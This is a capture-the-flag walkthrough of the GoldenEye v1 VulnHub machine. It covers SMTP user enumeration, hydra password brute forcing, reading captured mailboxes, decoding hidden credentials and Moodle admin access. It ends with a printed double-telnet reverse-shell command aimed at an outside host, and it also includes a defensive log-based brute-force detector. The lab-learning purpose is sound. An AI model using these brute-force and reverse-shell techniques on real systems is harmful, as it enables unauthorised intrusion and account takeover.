GoldenEye v1

VM URL: https://www.vulnhub.com/entry/goldeneye-1,240/

IP address of GoldenEye Virtual Machine: 10.0.133.48

Initial port scans

unicornscan of all TCP ports

root@kali:~/vulnhub/goldeneyev1# unicornscan -I 10.0.133.47:a
TCP open                smtp[   25]     from 10.0.133.47  ttl 64
TCP open                http[   80]     from 10.0.133.47  ttl 64
TCP open             unknown[55006]     from 10.0.133.47  ttl 64
TCP open             unknown[55007]     from 10.0.133.47  ttl 64

Further investigation into exposed services

SMTP on port 25

nmap -A scan of port 25 (-A enables: OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute):

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 25
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 11:29 BST
Nmap scan report for 10.0.133.48
Host is up (0.00046s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

nmap reports the SMTP server as Postfix but is unable to determine the version.

Connect with telnet and probe the server; further information may be learned from the banner, and it may be possible to enumerate user accounts with the SMTP VRFY and/or RCPT TO verbs.

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 25
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
220 ubuntu GoldentEye SMTP Electronic-Mail agent
HELO example.com
250 ubuntu
VRFY root
252 2.0.0 root
VRFY noexist
550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table

The server presents a customised banner, though it does still suggest the host OS is Ubuntu. “GoldentEye” is also misspelt, which might simply be a typo, but it is worth noting and possibly including in any word lists used for brute forcing logins.

Running VRFY on a user likely to exist, “root”, returns “252 2.0.0 root” (Cannot VRFY user, but will accept message and attempt delivery). On its own this neither confirms nor denies that the user exists on the server, but a further VRFY for a user “noexist” returns “550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table”. It seems we have discovered a way to enumerate email (and likely system) user accounts.

HTTP on port 80

nmap scan of service on port 80:

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 12:03 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds

The web server and version are returned.

Nikto scan of web server:

root@kali:~/vulnhub/goldeneyev1# nikto -h http://10.0.133.48/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.133.48
+ Target Hostname:    10.0.133.48
+ Target Port:        80
+ Start Time:         2018-08-03 12:03:09 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2018-08-03 12:03:27 (GMT1) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Visiting the website at http://10.0.133.48/ displays an animated faux login page for the “Severnaya Auxiliary Control Station”. Looking at the page source, and then at the terminal.js JavaScript responsible for the animation effect, reveals some encoded credentials.

goldeneye main page
<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>

    <span id="GoldenEyeText" class="typeing"></span><span class='blinker'>&#32;</span>

<script src="terminal.js"></script>

</html>
var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;


  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

These look like HTML numeric character references (&#NN;) encoding ASCII values.

Decode them using the unescape function from Python 3’s html library:

root@kali:~/vulnhub/goldeneyev1# python3
Python 3.6.6 (default, Jun 27 2018, 14:44:17)
[GCC 8.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import html
>>> a = '&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;'
>>> html.unescape(a)
'InvincibleHack3r'

Boris’s password is learned: InvincibleHack3r

The faux login teletype instructs us to navigate to http://10.0.133.48/sev-home; this page requires authentication (HTTP basic auth), so try to authenticate with Boris’s credentials:

goldeneye login page goldeneye main page

The credentials work and we are presented with a page informing us to:

“Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system”

The pop3 service is running on non default (not 110 POP3 or 995 POP3S) ports which have already been discovered by our initial port scan (55006 and 55007).

Nikto discovered a file called /splashAdmin.php (“Cobalt Qube 3 admin is running”); visiting this page returns Boris’s blog, which contains information that may prove useful later.

goldeneye boris blog page

The background is hideous and makes the text hard to read so read the source instead:

<html>
<body background="space.gif">
<h2 style="color:green;">Cobalt Qube 3 has been decommissioned</h2>
<br/>
<h3 style="color:white;">We can use this page to put up team photos, discussion, etc. Natalya is not allowed to post here though --Boris</h3>
<br/><br/>
<hr>
<p style="color:red;">Here's me with my new sniper rifle.</p>
<br/><br/>
<img src="sniper.png">
<br/>
<hr>
<p style="color:orange;">
Boris why are you wearing shorts in that photo? You do realize you're stationed above the Arctic circle, correct?
<br/><br/>
BTW your favorite pen broke, but I replaced it with a new special one.
<br/><br/>
Natalya "best coder" S.</p>
<hr>
<p style="color:red;">"License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"</p>
<hr>
<p style="color:white;">Greetings ya'll! GoldenEye Admin here.
<br/><br/>
For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. <br/>I've replaced GCC with this throughout the GolenEye systems.
<br/><br/>
Boris, no arguing about this, GCC has been removed and that's final!
<br/><br/>
Also why have you been chatting with Xenia in private Boris? She's a new contractor that you've never met before? Are you sure you've never worked together...?
<br/><br/>
-Admin
</p>
<hr>
<p style="color:purple;">
Janus was here
</p>
<hr>
</body>
</html>

From this page and the others discovered we can create a list of possible users on the server:

  • Boris
  • Natalya
  • Oddjob
  • Admin
  • Xenia
  • Janus

The line about replacing GCC with “the Alternative to GCC, which FreeBSD uses” (Clang) is also noteworthy.

POP3 on port 55006

nmap scan of POP3 on 55006

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55006
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00054s latency).

PORT      STATE SERVICE  VERSION
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE CAPA USER PIPELINING TOP SASL(PLAIN) RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds

The server listening on port 55006 expects an SSL/TLS session to be negotiated first, so we cannot talk to it directly with telnet. openssl s_client can instead be used to connect and negotiate the encryption, after which POP3 verbs can be issued over the encrypted session.

root@kali:~/vulnhub/goldeneyev1# openssl s_client --connect 10.0.133.48:55006
CONNECTED(00000003)
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
verify return:1

... (certificate chain redacted)

---
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.

We learn the server is running Dovecot, and the version does not appear to be vulnerable to any known exploits. We can connect and issue POP3 commands to try the credentials discovered earlier, but authentication fails.

POP3S on port 55007

nmap scan of POP3 on 55007

root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55007
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
Nmap scan report for 10.0.133.48
Host is up (0.00065s latency).

PORT      STATE SERVICE VERSION
55007/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL PIPELINING TOP STLS SASL(PLAIN) CAPA USER AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:1A:4A:16:01:30 (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 10.0.133.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

It is very likely that the same Dovecot instance is listening on both 55006 and 55007, simply providing a TLS-wrapped connection on the former. This is a common configuration for a mail server, and the banners and versions reported by nmap are identical.

The POP3 service on port 55007 does not use encryption so telnet can be used to connect and issue POP3 commands directly.

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
LIST
-ERR Unknown command.

Since it is almost certainly the same back-end Dovecot server, it makes little sense to perform further interactions on port 55006: this would yield the same results as port 55007, with the added overhead and complexity of encryption.

Plan of attack

A strong hint that the details required to compromise the machine further can be found in users’ email accounts was discovered on the GNO (/sev-home/) website. A list of possible users has been enumerated, along with a means to verify whether they have email accounts on the server. Given that the Dovecot server version does not appear to be vulnerable to any known exploits that would give access to users’ email, it is likely that the account passwords must be brute forced, using a wordlist of commonly used passwords or one generated from the pages and banners discovered on GoldenEye.

Exploitation

Enumerate POP3 accounts

From names found on the page at http://10.0.133.48/splashAdmin.php the following list of possible user names was created:

  • Boris
  • Natalya
  • Oddjob
  • Admin
  • Xenia
  • Janus

Run smtp-user-enum to discover if these users have email accounts on the server:

root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -U users.txt -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 6
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Aug  7 15:40:09 2018 #########
10.0.133.48: Natalya exists
10.0.133.48: Boris exists
######## Scan completed at Tue Aug  7 15:40:09 2018 #########
2 results.

6 queries in 1 seconds (6.0 queries / sec)

Script done on 2018-08-07 15:40:11+01:00

Brute force users passwords with hydra

A wordlist was generated using cewl from all the web pages discovered so far, mutated using john, and then used with hydra to try to guess the passwords for the root, boris and natalya accounts, but this was not successful.

user list:

root@kali:~/vulnhub/goldeneyev1# cat users.txt
root
Boris
Natalya

Brute force the password using hydra with the fasttrack wordlist:

root@kali:~/vulnhub/goldeneyev1# hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 16:42:39
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 666 login tries (l:3/p:222), ~42 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 586 to do in 00:08h, 16 active
[STATUS] 64.00 tries/min, 192 tries in 00:03h, 474 to do in 00:08h, 16 active

[55007][pop3] host: 10.0.133.48   login: Boris   password: secret1!
[STATUS] 70.43 tries/min, 493 tries in 00:07h, 173 to do in 00:03h, 16 active
[55007][pop3] host: 10.0.133.48   login: Natalya   password: bird
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 16:51:19

Boris and Natalya’s email account credentials are discovered.
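The hydra run above is loud from the server’s side: Dovecot logs every failed login together with the client address. As an added example (not part of the original walkthrough), the script below flags password-guessing bursts in such logs. The log lines are constructed in the format Dovecot’s pop3-login service writes to syslog, and the window length and failure threshold are arbitrary choices.

```python
"""Flag POP3 password-guessing bursts in Dovecot pop3-login log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines (not captured from the VM) in the format Dovecot's
# pop3-login service writes to syslog. The burst from 10.0.133.20 mirrors the
# hydra run: three usernames, many failures in a row, then a successful login.
SAMPLE_LOG = """\
Aug  7 16:42:39 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s1>
Aug  7 16:42:40 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<Boris>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s2>
Aug  7 16:42:41 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<Natalya>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s3>
Aug  7 16:42:55 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.0.133.7, lip=10.0.133.48, session=<s4>
Aug  7 16:43:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s5>
Aug  7 16:43:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<Boris>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s6>
Aug  7 16:43:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<Natalya>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s7>
Aug  7 16:43:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, session=<s8>
Aug  7 16:49:12 ubuntu dovecot: pop3-login: Login: user=<Boris>, method=PLAIN, rip=10.0.133.20, lip=10.0.133.48, mpid=2201, session=<s9>
"""

# Syslog timestamp, host, then Dovecot's "Login:" or "Disconnected (auth failed ...):" event.
LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: '
    r'(?P<event>Login|Disconnected \(auth failed[^)]*\)): '
    r'user=<(?P<user>[^>]*)>, method=\w+, rip=(?P<rip>[\d.]+)'
)

WINDOW_SECS = 60      # sliding window length (arbitrary choice)
FAIL_THRESHOLD = 5    # failures per source inside the window that raise an alert
LOG_YEAR = 2018       # syslog timestamps carry no year; assumed for the sample


def parse_line(line):
    """Return (timestamp, 'success'|'failure', user, client_ip) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%b %d %H:%M:%S').replace(year=LOG_YEAR)
    event = 'success' if m['event'] == 'Login' else 'failure'
    return ts, event, m['user'], m['rip']


def detect_bursts(log_text, window=WINDOW_SECS, threshold=FAIL_THRESHOLD):
    """Return alerts: one 'burst' per client the first time its failures inside
    the window reach the threshold, plus a 'success_after_burst' for every
    later successful login from a client that was flagged."""
    recent = defaultdict(deque)       # client ip -> timestamps of recent failures
    users_tried = defaultdict(set)    # client ip -> usernames seen failing
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, event, user, rip = parsed
        if event == 'failure':
            q = recent[rip]
            q.append(ts)
            users_tried[rip].add(user.lower())
            while (ts - q[0]).total_seconds() > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and rip not in flagged:
                flagged.add(rip)
                alerts.append({'type': 'burst', 'rip': rip, 'at': ts,
                               'failures': len(q), 'users': sorted(users_tried[rip])})
        elif rip in flagged:
            alerts.append({'type': 'success_after_burst', 'rip': rip, 'at': ts, 'user': user})
    return alerts


if __name__ == '__main__':
    for alert in detect_bursts(SAMPLE_LOG):
        print(alert)
```

A success following a flagged burst is the event worth paging on; a single failure from another client, like the one from 10.0.133.7 in the sample, stays below the threshold.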

Read Boris’s email

Telnet to the Dovecot server, login as boris and retrieve his email:

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id D9E47454B1
    for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. 
I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id C3F2B454B1
    for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id 4B9F4454B1
    for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye.
Place them in a hidden file within the root directory of this server then remove from this email.
There can only be one set of these acces codes, and we need to secure them for the final execution.
If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
.
QUIT
+OK Logging out.
Connection closed by foreign host.

No credentials are found, but the admin’s note that emails are not scanned for security risks (no DLP, Data Loss Prevention, on the mail server) is a strong hint that there may be some in natalya’s account.

Read Natalya’s email

Telnet to the Dovecot server, login as natalya and retrieve her email:

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id D5EDA454B1
    for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. 
I will email you once a student is designated to you. Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 17C96454B1
    for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you.
As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
QUIT
+OK Logging out.
Connection closed by foreign host.

A new service is discovered at severnaya-station.com/gnocertdir, with instructions to edit /etc/hosts so that the domain resolves to the server’s IP (10.0.133.48). The site is likely an Apache virtual host, so the request’s Host header must carry the domain name rather than the IP for Apache to serve the correct content.

Add domain to /etc/hosts

root@kali:~/vulnhub/goldeneyev1# echo "10.0.133.48 severnaya-station.com" >> /etc/hosts

Once the mapping of domain to IP is added to /etc/hosts we can browse to the URL

goldeneye moodle

and login with Xenia’s credentials discovered in Natalyas emails.

goldeneye moodle login xenia

Exploring Xenia’s Moodle account

A message from “Dr Doak” was discovered; the following suggests Dr Doak may also have an email account on the server: “If you have any questions message me via email, not here.”

goldeneye moodle doak msg

smtp-user-enum confirms Dr. Doak does indeed have an email account on the server:

root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -u doak -t 10.0.133.48
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Tue Aug  7 18:52:18 2018 #########
10.0.133.48: doak exists
######## Scan completed at Tue Aug  7 18:52:18 2018 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)
root@kali:~/vulnhub/goldeneyev1# hydra -l doak -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:53:56
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.0.133.48:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.0.133.48   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 18:56:16

Username: doak

Password: goat

Reading Doak’s email

root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
Trying 10.0.133.48...
Connected to 10.0.133.48.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: 
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 97DC24549D
    for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.
QUIT
+OK Logging out.
Connection closed by foreign host.

Dr Doak’s Moodle credentials are discovered.

Exploring Dr. Doak’s Moodle account

A file named “s3cret.txt” is discovered on his Moodle file storage:

goldeneye moodle doaks file

The file contains:

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

The message directs us to an image file at http://severnaya-station.com/dir007key/for-007.jpg; maybe the admin credentials are stored there?

Download this file and read the EXIF metadata stored in the image using exif:

root@kali:~/vulnhub/goldeneyev1# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |eFdpbnRlcjE5OTV4IQ==
Manufacturer        |GoldenEye
Resolution Unit     |Inch
Software            |linux
Artist              |For James
YCbCr Positioning   |Centred
X-Resolution        |72
Y-Resolution        |72
Exif Version        |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment        |For 007
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

The Image Description field looks suspiciously like a base64 encoded string; let’s decode it:

root@kali:~/vulnhub/goldeneyev1# echo -n "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!

Logging into the admin users Moodle account

The admin user has much greater privileges on the Moodle installation, and after some exploration a feature of the application was discovered that may allow remote code execution (RCE) on the server.

goldeneye moodle aspell path

The path is set to:

sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

Breaking this command down, it looks like a reverse shell, more specifically metasploit’s “Unix Command Shell, Double Reverse TCP (telnet)” payload (cmd/unix/reverse):

  • sh -c executes the command string that follows
  • the parentheses () group the commands and run them in a subshell
  • sleep 4062 piped into the first telnet keeps that connection’s stdin open, so it does not return straight away
  • the output of the first telnet connection is piped into a while loop that runs sh (and breaks out once it exits), with STDERR redirected to STDOUT
  • this is piped into a second telnet connection whose own output is discarded (>/dev/null 2>&1)
  • & backgrounds the whole thing

This builds a reverse shell using the two telnet sessions: commands arrive over the first connection and their output leaves over the second.

@TODO investigate further how this works

@TODO why does a simple reverse shell using bash not work?
